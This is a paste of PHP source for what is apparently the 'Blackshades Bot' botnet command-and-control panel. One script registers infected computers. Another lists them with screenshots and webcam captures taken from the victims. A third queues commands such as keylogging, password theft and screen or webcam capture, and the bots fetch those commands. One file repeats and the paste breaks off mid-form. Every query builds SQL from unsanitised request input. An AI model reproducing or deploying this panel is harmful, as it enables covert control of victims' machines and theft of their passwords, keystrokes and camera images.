· 10 years ago · May 27, 2016, 05:51 PM
1==> alive.php <==
2<?php
3 error_reporting(0);
4 include_once('db/database.inc.php');
5 include_once('config.php');
6
7 if(isset($_GET['key']) && isset($_GET['hwid']) && isset($_GET['country'])){
8 if($_GET['key'] == $CFG_PASSWORD){ //Auth check
9 date_default_timezone_set(date_default_timezone_get());
10 $date = new DateTime("now");
11 //Check to see if this bot is already registered
12 $res = mysql_query("SELECT bot_id FROM tbl_bot WHERE bot_hwid = '{$_GET['hwid']}'");
13
14 if(mysql_num_rows($res) == 0){ //Bot doesn't exists, let's add the bot to db
15 $ins = mysql_query("INSERT INTO tbl_bot (bot_wan, bot_pc_user, bot_pc_name, bot_hwid, bot_country, bot_lastseen, bot_lastdate)
16 VALUES ('" . $_SERVER['REMOTE_ADDR'] . "', '" . $_GET['pcuser'] . "', '" . $_GET['pcname'] . "', '" . $_GET['hwid'] . "', '" . $_GET['country'] . "', '"
17 . $date->format('Y-m-d H:i:s') . "', '" . $date->format('Y-m-d') . "')");
18 mysql_free_result($ins);
19 mysql_free_result($res);
20 }else{ //Bot already exists, let's update its stats
21 $ins = mysql_query("UPDATE tbl_bot SET bot_pc_user = '{$_GET['pcuser']}', bot_pc_name = '{$_GET['pcname']}', bot_wan = '{$_SERVER['REMOTE_ADDR']}',
22 bot_country = '{$_GET['country']}', bot_lastseen = '{$date->format('Y-m-d H:i:s')}',
23 bot_lastdate = '{$date->format('Y-m-d')}' WHERE bot_hwid = '{$_GET['hwid']}'");
24 mysql_free_result($ins);
25
26 //Check to see if bot need to be tagged in history table
27 $hst = mysql_query("SELECT bot_hwid FROM tbl_history WHERE bot_hwid = '{$_GET['hwid']}' AND hst_lastdate = '{$date->format('Y-m-d')}'");
28 if(mysql_num_rows($hst) == 0){
29 $ins = mysql_query("INSERT INTO tbl_history (bot_hwid, hst_lastdate)
30 VALUES ('" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "')");
31 mysql_free_result($hst);
32 mysql_free_result($ins);
33 }
34 }
35 }else{ //Wrong password/key
36 echo $CFG_ERROR_MSG;
37 }
38 }else{ //Invalid request
39 echo $CFG_ERROR_MSG;
40 }
41 exit;
42?>
43==> blackshades.php <==
44==> alive.php <==
45<?php
46 error_reporting(0);
47 include_once('db/database.inc.php');
48 include_once('config.php');
49
50 if(isset($_GET['key']) && isset($_GET['hwid']) && isset($_GET['country'])){
51 if($_GET['key'] == $CFG_PASSWORD){ //Auth check
52 date_default_timezone_set(date_default_timezone_get());
53 $date = new DateTime("now");
54 //Check to see if this bot is already registered
55 $res = mysql_query("SELECT bot_id FROM tbl_bot WHERE bot_hwid = '{$_GET['hwid']}'");
56
57 if(mysql_num_rows($res) == 0){ //Bot doesn't exists, let's add the bot to db
58 $ins = mysql_query("INSERT INTO tbl_bot (bot_wan, bot_pc_user, bot_pc_name, bot_hwid, bot_country, bot_lastseen, bot_lastdate)
59 VALUES ('" . $_SERVER['REMOTE_ADDR'] . "', '" . $_GET['pcuser'] . "', '" . $_GET['pcname'] . "', '" . $_GET['hwid'] . "', '" . $_GET['country'] . "', '"
60 . $date->format('Y-m-d H:i:s') . "', '" . $date->format('Y-m-d') . "')");
61 mysql_free_result($ins);
62 mysql_free_result($res);
63 }else{ //Bot already exists, let's update its stats
64 $ins = mysql_query("UPDATE tbl_bot SET bot_pc_user = '{$_GET['pcuser']}', bot_pc_name = '{$_GET['pcname']}', bot_wan = '{$_SERVER['REMOTE_ADDR']}',
65 bot_country = '{$_GET['country']}', bot_lastseen = '{$date->format('Y-m-d H:i:s')}',
66 bot_lastdate = '{$date->format('Y-m-d')}' WHERE bot_hwid = '{$_GET['hwid']}'");
67 mysql_free_result($ins);
68
69 //Check to see if bot need to be tagged in history table
70 $hst = mysql_query("SELECT bot_hwid FROM tbl_history WHERE bot_hwid = '{$_GET['hwid']}' AND hst_lastdate = '{$date->format('Y-m-d')}'");
71 if(mysql_num_rows($hst) == 0){
72 $ins = mysql_query("INSERT INTO tbl_history (bot_hwid, hst_lastdate)
73 VALUES ('" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "')");
74 mysql_free_result($hst);
75 mysql_free_result($ins);
76 }
77 }
78 }else{ //Wrong password/key
79 echo $CFG_ERROR_MSG;
80 }
81 }else{ //Invalid request
82 echo $CFG_ERROR_MSG;
83 }
84 exit;
85?>
86==> blackshades.php <==
87
88==> bots.php <==
89<?php
90 error_reporting(0);
91 include_once('db/database.inc.php');
92
93 if (!$auth->verify()){ //If unauthorized
94 Header("Location: index.php");
95 exit;
96 }
97?>
98
99<html>
100<header>
101<style type="text/css">
102body {
103 margin:0px;
104 padding:0px;
105 background:#202020;
106 color:#8e8e8e;
107 font-family:Arial;
108 font-size:12px
109}
110table { color:#8e8e8e;font-family:Arial;font-size:12px}
111a { color:#8e8e8e;text-decoration:none;}
112input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
113 <!--
114 .tb_summary {
115 text-align: center;
116 font-weight: bold;
117 }
118 .tb_summary_cols {
119 text-align: center;
120 }
121 .tb_summary_cols {
122 text-align: left;
123 }
124 .tb_img {
125 text-align: center;
126 }
127 .tb_img_header {
128 font-weight: bold;
129 text-align: center;
130 font-size:14px
131 }
132 .tb_col_header {
133 font-weight: bold;
134 text-align: left;
135 font-size:14px
136 }
137 div.img img
138 {
139 margin:3px;
140 border:1px solid #202020;
141 }
142 div.img a:hover img
143 {
144 border:1px solid #0000ff;
145 }
146 -->
147</style>
148
149</header>
150<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Bots
151<?php include_once('header.php'); ?>
152
153<title>Blackshades Bot</title>
154<br/><br/>
155<center>
156 <form id="f_bots" name="f_bot" method="post" action="">
157 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary"><img src='img/main/date.png' width='16' height='16'/> Show by:</span>
158 <select name="bot_date" id="bot_date">
159 <?php
160 $res = mysql_query("SELECT DISTINCT bot_lastdate FROM tbl_bot ORDER BY bot_lastdate DESC");
161 echo "<option value='All'>All</option>";
162 echo "<option value='Online'>Online</option>";
163 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
164 echo "<option value='" . $row['bot_lastdate'] . "'" . ">" . $row['bot_lastdate'] . "</option>";
165 }
166 mysql_free_result($res);
167 ?>
168 </select>
169 <label><img src="img/main/search.png" width="16" height="12"/>Search:<input name="tf_search" type="text" id="tf_search" size="32"></label> <input type="submit" name="btn_bot" id="btn_bot" value="Show"/>
170</div></form></center>
171
172<br/>
173 <p>
174 <?php
175 error_reporting(0);
176 if(isset($_POST['btn_bot']) || isset($_GET['page']))
177 {
178 if($_POST['bot_date'] == 'All'){ //Show all bots
179 if(!empty($_POST['tf_search'])){ //Using search
180 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot WHERE " .
181 "bot_id LIKE '%{$_POST['tf_search']}%' OR bot_hwid LIKE '%{$_POST['tf_search']}%' OR bot_wan LIKE '%{$_POST['tf_search']}%'" .
182 "OR bot_pc_name LIKE '%{$_POST['tf_search']}%' OR bot_pc_user LIKE '%{$_POST['tf_search']}%' OR bot_country LIKE '%{$_POST['tf_search']}%' OR bot_lastseen LIKE '%{$_POST['tf_search']}%'");
183 }else{
184 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot");
185 }
186 }elseif($_POST['bot_date'] == 'Online'){
187 date_default_timezone_set(date_default_timezone_get());
188 $dateTime = new DateTime("now");
189 //$dateTime->sub(new DateInterval('PT0H30M'));
190 $dateTime->modify('-30 minutes');
191
192 if(!empty($_POST['tf_search'])){ //Using search
193 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot WHERE bot_lastseen > '{$dateTime->format('Y-m-d H:i:s')}' AND (" .
194 "bot_id LIKE '%{$_POST['tf_search']}%' OR bot_hwid LIKE '%{$_POST['tf_search']}%' OR bot_wan LIKE '%{$_POST['tf_search']}%'" .
195 "OR bot_pc_name LIKE '%{$_POST['tf_search']}%' OR bot_pc_user LIKE '%{$_POST['tf_search']}%' OR bot_country LIKE '%{$_POST['tf_search']}%' OR bot_lastseen LIKE '%{$_POST['tf_search']}%')");
196 }else{
197 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot WHERE bot_lastseen > '{$dateTime->format('Y-m-d H:i:s')}'");
198 }
199 }elseif(isset($_GET['page'])){
200 $rows = mysql_num_rows(mysql_query("SELECT * FROM tbl_bot"));
201 $pos = ($_GET['page'] * $PAGE_ROWS_LIMIT) - $PAGE_ROWS_LIMIT;
202 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot LIMIT $pos,$PAGE_ROWS_LIMIT");
203 }else{
204 if(!empty($_POST['tf_search'])){ //Using search
205 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot WHERE bot_lastdate = '{$_POST['bot_date']}' AND (" .
206 "bot_id LIKE '%{$_POST['tf_search']}%' OR bot_hwid LIKE '%{$_POST['tf_search']}%' OR bot_wan LIKE '%{$_POST['tf_search']}%'" .
207 "OR bot_pc_name LIKE '%{$_POST['tf_search']}%' OR bot_pc_user LIKE '%{$_POST['tf_search']}%' OR bot_country LIKE '%{$_POST['tf_search']}%' OR bot_lastseen LIKE '%{$_POST['tf_search']}%')");
208 }else{
209 $res = mysql_query("SELECT bot_id, bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, bot_lastseen FROM tbl_bot WHERE bot_lastdate = '{$_POST['bot_date']}'");
210 }
211 }
212 echo "<table width='1180' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
213 echo "<tr><th width='5%' class='tb_col_header'>" . "<img src='img/main/id.png' width='14' height='14'/> " . "ID</th>" .
214 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "HWID</th>" .
215 "<th width='7%' class='tb_col_header'>" . "<img src='img/main/wan.png' width='14' height='14'/> " . "WAN</th>" .
216 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/pc.png' width='14' height='14'/> " . "PC Name</th>" .
217 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/username.png' width='14' height='14'/> " . "User name</th>" .
218 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
219 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/seen.png' width='14' height='14'/> " . "Last seen</th>" .
220 "<th width='5%' class='tb_col_header'></th></tr>";
221
222 echo "<tr><td width='5%' class='tb_summary_cols'> </td>" .
223 "<td width='8%' class='tb_summary_cols'> </td>" .
224 "<td width='7%' class='tb_summary_cols'> </td>" .
225 "<td width='15%' class='tb_summary_cols'> </td>" .
226 "<td width='15%' class='tb_summary_cols'> </td>" .
227 "<td width='10%' class='tb_summary_cols'> </td>" .
228 "<td width='10%' class='tb_summary_cols'> </td>" .
229 "<td width='5%' class='tb_summary_cols'> </td></tr>";
230
231 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
232 if(file_exists('screens/' . $row['bot_hwid'] . ".jpg")){ //Has screencapture
233 $scr = "<a href='bots.php?scr={$row['bot_hwid']}'><img src='img/main/picture.png' width='16' height='16'/></a>";
234 }else{
235 $scr = "";
236 }
237 if(file_exists('webcam/' . $row['bot_hwid'] . ".jpg")){ //Has webcam capture
238 $webc = "<a href='bots.php?webc={$row['bot_hwid']}'><img src='img/main/camera.png' width='16' height='16'/></a>";
239 }else{
240 $webc = "";
241 }
242
243 echo "<tr><td width='5%' class='tb_summary_cols'>" . $row['bot_id'] . "</td>" .
244 "<td width='8%' class='tb_summary_cols'>" . $row['bot_hwid'] . "</td>" .
245 "<td width='7%' class='tb_summary_cols'>" . $row['bot_wan'] . "</td>" .
246 "<td width='15%' class='tb_summary_cols'>" . $row['bot_pc_name'] . "</td>" .
247 "<td width='15%' class='tb_summary_cols'>" . $row['bot_pc_user'] . "</td>" .
248 "<td width='10%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . "</td>" .
249 "<td width='10%' class='tb_summary_cols'>" . $row['bot_lastseen'] . "</td>" .
250 "<td width='5%' class='tb_summary_cols'><div class='img'>" . $scr . " " . $webc . "</div></td></tr>";
251 }
252 echo "</table><br/><br/>";
253 mysql_free_result($res);
254 }
255?>
256<?php
257 if(isset($_GET['scr'])) //View screencapture of specific bot
258 {
259 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, scr_datetime FROM tbl_bot,tbl_scr WHERE tbl_bot.bot_hwid = '{$_GET['scr']}' AND tbl_scr.bot_hwid = '{$_GET['scr']}'");
260 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
261 echo "<table width='40%' style='border:0px solid #505050' align='center' cellspacing='0' cellpadding='1'>".
262 "<tr><th width='5%' class='tb_img_header'>" . $row['bot_wan']."^".$row['bot_pc_user']."-".$row['bot_pc_name']." (ID: ".$row['bot_hwid'].") [".$row['scr_datetime']."]" . "</th></tr>".
263 "<td width='5%' class='tb_img'><br/><img src='screens/" . $_GET['scr'] . ".jpg'/></td></tr>".
264 "</table><br/><br/>";
265 }
266 mysql_free_result($res);
267 exit;
268 }
269
270 if(isset($_GET['webc'])) //View screencapture of specific bot
271 {
272 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, webc_datetime FROM tbl_bot,tbl_webc WHERE tbl_bot.bot_hwid = '{$_GET['webc']}' AND tbl_webc.bot_hwid = '{$_GET['webc']}'");
273 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
274 echo "<table width='40%' style='border:0px solid #505050' align='center' cellspacing='0' cellpadding='1'>".
275 "<tr><th width='5%' class='tb_img_header'>" . $row['bot_wan']."^".$row['bot_pc_user']."-".$row['bot_pc_name']." (ID: ".$row['bot_hwid'].") [".$row['webc_datetime']."]" . "</th></tr>".
276 "<td width='5%' class='tb_img'><br/><img src='webcam/" . $_GET['webc'] . ".jpg'/></td></tr>".
277 "</table><br/><br/>";
278 }
279 mysql_free_result($res);
280 exit;
281 }
282
283 $rows = mysql_result (mysql_query("SELECT COUNT(*) FROM tbl_bot"),0); //Get number of records
284 echo "<br/><center><div style='font-family:Arial;font-size:18px;color:#636363'><span class='tb_summary'>Page: ";
285 while($rows >= 0){
286 $page++;
287 if($page % 25 == 0)
288 echo "<br/>";
289 if($rows >= $PAGE_ROWS_LIMIT){
290 if($_GET['page'] == $page)
291 echo "<span style='font-size:12px'><a href='bots.php?page={$page}'>$page</a></span> ";
292 else
293 echo "<a href='bots.php?page={$page}'>$page</a> ";
294 }else{
295 if($_GET['page'] == $page)
296 echo "<span style='font-size:12px'><a href='bots.php?page={$page}'>$page</a></span> ";
297 else
298 echo "<a href='bots.php?page={$page}'>$page</a> ";
299 }
300 $rows -= $PAGE_ROWS_LIMIT;
301 }
302 echo "</div></center>";
303?>
304==> classes:account.php <==
305<?php
306 error_reporting(0);
307
308 class Account{
309 public $id;
310 public $username;
311
312 public function __construct($username)
313 {
314 $this->username = $username;
315 $this->id = $this->id_get();
316 }
317
318 public function bots_total()
319 {
320 global $db;
321 $data = $db->query_first("SELECT COUNT(bot_id) FROM tbl_bot");
322 return $data['COUNT(bot_id)'];
323 }
324
325 public function bots_online()
326 {
327 global $db;
328
329 $dateDay = new DateTime("now");
330
331 $dateTime = new DateTime("now");
332 $dateTime->modify('-30 minutes');
333
334 $data = $db->query_first("SELECT COUNT(bot_id) FROM tbl_bot WHERE bot_lastseen >= '" . $dateDay->format('Y-m-d') . "' AND bot_lastseen > '" . $dateTime->format('Y-m-d H:i:s') . "'");
335 return $data['COUNT(bot_id)'];
336 }
337
338 public function bots_dead()
339 {
340 include('./config.php');
341 global $db;
342
343 $dateDay = new DateTime("now");
344 $dateDay->modify('-' . $DEAD_DAYS_MIN . ' days');
345
346 $data = $db->query_first("SELECT COUNT(bot_id) FROM tbl_bot WHERE bot_lastdate <= '" . $dateDay->format('Y-m-d') . "'");
347 return $data['COUNT(bot_id)'];
348 }
349
350 public function id_get()
351 {
352 global $db;
353 $data = $db->query_first("SELECT acc_id FROM tbl_account WHERE acc_name = '$this->username'");
354 return $data['id'];
355 }
356
357 public function last_ip_get()
358 {
359 global $db;
360 $data = $db->query_first("SELECT acc_lastip FROM tbl_account WHERE acc_name = '$this->username'");
361 return $data['acc_lastip'];
362 }
363
364 public function last_logon()
365 {
366 global $db;
367 $data = $db->query_first("SELECT acc_lastlogon FROM tbl_account WHERE acc_name = '$this->username'");
368 return $data['acc_lastlogon'];
369 }
370 }
371?>
372==> classes:index.php <==
373<?php
374 include_once('../config.php');
375 echo $CFG_ERROR_MSG;
376?>
377==> cmd.php <==
378<?php
379 error_reporting(0);
380 include_once('db/database.inc.php');
381 include_once('config.php');
382
383 if(isset($_GET['key']) && isset($_GET['hwid'])) //Get active commands
384 {
385 if($_GET['key'] == $CFG_PASSWORD && !empty($_GET['hwid'])){ //Auth check
386 $res = mysql_query("SELECT cmd_id, cmd_type, cmd_data, cmd_bot_hwid, cmd_filter_limit, cmd_filter_exec, cmd_filter_country FROM tbl_cmd");
387 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
388 $check = mysql_query("SELECT bot_hwid FROM tbl_cmd_exec WHERE bot_hwid = '{$_GET['hwid']}' AND cmd_id = {$row['cmd_id']}");
389 if(mysql_num_rows($check) == 0){ //Make sure this command hasn't already been sent to this bot
390 if($row['cmd_filter_limit'] == '0'){
391 date_default_timezone_set(date_default_timezone_get());
392 $date = new DateTime("now");
393 $exec = mysql_query("INSERT INTO tbl_cmd_exec (cmd_id, bot_hwid, exec_date, exec_time) VALUES ('" . $row['cmd_id'] . "', '" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')") or die(); //Increase number of executions
394
395 echo $row['cmd_type'] . "<dm>" . $row['cmd_data'] . "<dm>" . $row['cmd_bot_hwid'] . "<dm>" . $row['cmd_filter_country'] . "<br/>";
396 $exec = mysql_query("UPDATE tbl_cmd SET cmd_filter_exec = cmd_filter_exec + 1 WHERE cmd_id = '{$row['cmd_id']}'"); //Increase number of executions
397 }else{ //Count limit check
398 if($row['cmd_filter_exec'] < $row['cmd_filter_limit']){
399 $date = new DateTime("now");
400 $exec = mysql_query("INSERT INTO tbl_cmd_exec (cmd_id, bot_hwid, exec_date, exec_time) VALUES ('" . $row['cmd_id'] . "', '" . $_GET['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')") or die(); //Increase number of executions
401
402 echo $row['cmd_type'] . "<dm>" . $row['cmd_data'] . "<dm>" . $row['cmd_bot_hwid'] . "<dm>" . $row['cmd_filter_country'] . "<br/>";
403 $exec = mysql_query("UPDATE tbl_cmd SET cmd_filter_exec = cmd_filter_exec + 1 WHERE cmd_id = '{$row['cmd_id']}'"); //Increase number of executions
404 mysql_free_result($exec);
405 }
406 }
407 }
408 mysql_free_result($check);
409 }
410 mysql_free_result($res);
411 }else{ //Wrong password/key
412 echo $CFG_ERROR_MSG;
413 }
414 exit;
415 }
416
417 if (!$auth->verify()){ //If unauthorized
418 Header("Location: index.php");
419 exit;
420 }
421
422 if(isset($_POST['btn_cmd']))
423 {
424 //Check privileges
425 if($_SESSION['privileges'] == '0'){
426 echo $CFG_UNATHORIZED;
427 exit;
428 }
429
430 if(empty($_POST['tf_filter'])){
431 $cmd_filter = "All";
432 }else{
433 $cmd_filter = $_POST['tf_filter'];
434 }
435
436 if(empty($_POST['tf_hwid'])){
437 $cmd_hwid = "All";
438 }else{
439 $cmd_hwid = $_POST['tf_hwid'];
440 }
441
442 if($_POST['cmd_type'] == 'UNINSTALL' || $_POST['cmd_type'] == 'PWS' || $_POST['cmd_type'] == 'SCR' || $_POST['cmd_type'] == 'WC' || $_POST['cmd_type'] == 'BTKL' || $_POST['cmd_type'] == 'EMGB'){
443 mysql_query("INSERT INTO tbl_cmd (cmd_type, cmd_data, cmd_bot_hwid, cmd_filter_limit, cmd_filter_country) VALUES ('" . $_POST['cmd_type'] . "', '" . $_POST['tf_data'] . "', '" . $cmd_hwid . "', '" . $_POST['tf_limit'] . "', '" . $cmd_filter . "')");
444 }elseif($_POST['tf_data'] <> ""){
445 mysql_query("INSERT INTO tbl_cmd (cmd_type, cmd_data, cmd_bot_hwid, cmd_filter_limit, cmd_filter_country) VALUES ('" . $_POST['cmd_type'] . "', '" . $_POST['tf_data'] . "', '" . $cmd_hwid . "', '" . $_POST['tf_limit'] . "', '" . $cmd_filter . "')");
446 }
447 }
448?>
449
450<html>
451<header>
452<style type="text/css">
453 body {
454 margin:0px;
455 padding:0px;
456 background:#202020;
457 color:#8e8e8e;
458 font-family:Arial;
459 font-size:12px
460 }
461 table { color:#8e8e8e;font-family:Arial;font-size:12px}
462 a { color:#8e8e8e;text-decoration:none;}
463 input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
464 <!--
465 .tb_summary {
466 text-align: center;
467 font-weight: bold;
468 }
469 .tb_summary_cols {
470 text-align: center;
471 }
472 .tb_summary_cols {
473 text-align: left;
474 }
475 .tb_col_header {
476 font-weight: bold;
477 text-align: left;
478 font-size:14px
479 }
480 div.img img
481 {
482 margin:3px;
483 border:1px solid #202020;
484 }
485 div.img a:hover img
486 {
487 border:1px solid #0000ff;
488 }
489 -->
490</style>
491</header>
492<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Commands
493<?php include_once('header.php'); ?>
494
495<title>Blackshades Bot</title>
496<br/><br/><br/>
497<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Active commands</span> <img src="img/main/cmd.png" width="16" height="16"/></div></center>
498<?php
499 if(isset($_GET['cmddel'])) //Delete command
500 {
501 //Check privileges
502 if($_SESSION['privileges'] == '1'){
503 $res = mysql_query("DELETE FROM tbl_cmd WHERE cmd_id = {$_GET['cmddel']}");
504 }
505 }
506
507 $res = mysql_query("SELECT cmd_id, cmd_type, cmd_data, cmd_bot_hwid, cmd_filter_limit, cmd_filter_exec, cmd_filter_country FROM tbl_cmd ORDER BY cmd_id ASC") or die(mysql_error());
508 echo "<table width='920' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
509 echo "<tr><th width='15%' class='tb_col_header'>" . "<img src='img/main/cmd.png' width='14' height='14'/> " . "Command type</th>" .
510 "<th width='25%' class='tb_col_header'>" . "<img src='img/main/data.png' width='14' height='14'/> " . "Data</th>" .
511 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "Bot ID</th>" .
512 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Count limit</th>" .
513 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/exec.png' width='14' height='14'/> " . "Executions</th>" .
514 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Allowed country</th>" .
515 "<th width='8%' class='tb_col_header'> </th></tr>";
516
517 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
518 echo "<tr><td width='15%' class='tb_summary_cols'> </td>" .
519 "<td width='25%' class='tb_summary_cols'> </td>" .
520 "<td width='12%' class='tb_summary_cols'> </td>" .
521 "<td width='12%' class='tb_summary_cols'> </td>" .
522 "<td width='12%' class='tb_summary_cols'> </td>" .
523 "<td width='15%' class='tb_summary_cols'> </td>" .
524 "<td width='8%' class='tb_summary_cols'> </td></tr>";
525
526 if($row['cmd_filter_limit'] == '0')
527 $limit = 'N/A';
528 else
529 $limit = $row['cmd_filter_limit'];
530
531 if(empty($row['cmd_bot_hwid']))
532 $hwid = 'All';
533 else
534 $hwid = $row['cmd_bot_hwid'];
535
536
537 echo "<tr><td width='15%' class='tb_summary_cols'>" . $row['cmd_type'] . "</td>" .
538 "<td width='25%' class='tb_summary_cols'>" . $row['cmd_data'] . "</td>" .
539 "<td width='12%' class='tb_summary_cols'>" . $hwid . "</td>" .
540 "<td width='12%' class='tb_summary_cols'>" . $limit . "</td>" .
541 "<td width='12%' class='tb_summary_cols'>" . $row['cmd_filter_exec'] . "</td>" .
542 "<td width='15%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['cmd_filter_country']) . ".gif' width='16' height='12'/> " . $row['cmd_filter_country'] . "</td>" .
543 "<td width='8%' class='tb_summary_cols'>" . "<div class='img'><a href='cmd.php?cmdcountry={$row['cmd_id']}'><img src='img/main/country.png' width='16' height='16'/></a><a href='cmd.php?cmdinfo={$row['cmd_id']}'><img src='img/main/info.png' width='16' height='16'/></a><a href='cmd.php?cmddel={$row['cmd_id']}'><img src='img/main/remove.png' width='16' height='16'/></a></div></td></tr>";
544 }
545 echo "</table>" . "<br/><br/>";
546
547 if(isset($_GET['cmdinfo'])) //Specific info regarding a command
548 {
549 $res = mysql_query("SELECT bot_id, tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, bot_country, exec_time FROM " .
550 "tbl_bot,tbl_cmd_exec WHERE cmd_id = '{$_GET['cmdinfo']}' AND tbl_bot.bot_hwid = tbl_cmd_exec.bot_hwid");
551
552 echo "<center><div style='font-family:Arial;font-size:16px;color:#636363'><span class='tb_summary'>Affected bots</span></div></center>";
553 echo "<table width='1024' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
554 echo "<tr><th width='5%' class='tb_col_header'>" . "<img src='img/main/id.png' width='14' height='14'/> " . "ID</th>" .
555 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "HWID</th>" .
556 "<th width='7%' class='tb_col_header'>" . "<img src='img/main/wan.png' width='14' height='14'/> " . "WAN</th>" .
557 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/pc.png' width='14' height='14'/> " . "PC Name</th>" .
558 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/username.png' width='14' height='14'/> " . "User name</th>" .
559 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
560 "<th width='12%' class='tb_col_header'>" . "<img src='img/main/seen.png' width='14' height='14'/> " . "Date of execution</th></tr>";
561
562 echo "<tr><td width='5%' class='tb_summary_cols'> </td>" .
563 "<td width='8%' class='tb_summary_cols'> </td>" .
564 "<td width='7%' class='tb_summary_cols'> </td>" .
565 "<td width='15%' class='tb_summary_cols'> </td>" .
566 "<td width='15%' class='tb_summary_cols'> </td>" .
567 "<td width='10%' class='tb_summary_cols'> </td>" .
568 "<td width='12%' class='tb_summary_cols'> </td></tr>";
569
570 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
571 echo "<tr><td width='5%' class='tb_summary_cols'>" . $row['bot_id'] . "</td>" .
572 "<td width='8%' class='tb_summary_cols'>" . $row['bot_hwid'] . "</td>" .
573 "<td width='7%' class='tb_summary_cols'>" . $row['bot_wan'] . "</td>" .
574 "<td width='15%' class='tb_summary_cols'>" . $row['bot_pc_name'] . "</td>" .
575 "<td width='15%' class='tb_summary_cols'>" . $row['bot_pc_user'] . "</td>" .
576 "<td width='10%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . "</td>" .
577 "<td width='12%' class='tb_summary_cols'>" . $row['exec_time'] . "</td></tr>";
578 }
579 echo "</table>" . "<br/><br/>";
580 }
581
582 if(isset($_GET['cmdcountry'])) //Specific info regarding a command
583 {
584 $res = mysql_query("SELECT bot_country, COUNT(bot_id) FROM tbl_bot,tbl_cmd_exec WHERE cmd_id = '{$_GET['cmdcountry']}' AND tbl_bot.bot_hwid = tbl_cmd_exec.bot_hwid GROUP BY bot_country");
585 echo "<center><div style='font-family:Arial;font-size:16px;color:#636363'><span class='tb_summary'>Affects bots by country</span></div></center>";
586 echo "<table width='25%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
587 echo "<tr><th width='20%' class='tb_col_header'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
588 "<th width='8%' class='tb_col_header'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Total</th>";
589
590 echo "<tr><td width='35%' class='tb_summary_cols'> </td>" .
591 "<td width='8%' class='tb_summary_cols'> </td></tr>";
592
593 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
594 echo "<tr>".
595 "<td width='35%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . "</td>" .
596 "<td width='8%' class='tb_summary_rows'>" . $row['COUNT(bot_id)'] . "</td>" .
597 "</tr>";
598 }
599 echo "</table><br/><br/>";
600 }
601?>
602<br/>
603<center>
604 <form id="f_cmd" name="f_cmd" method="post" action="">
605 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary"><img src='img/main/type.png' width='16' height='16'/> Command type:</span>
606 <select name="cmd_type" id="cmd_type">
607 <option value='KLG'>Keylog</option>
608 <option value='PWS'>Passwords</option>
609 <option value='SCR'>Screen capture</option>
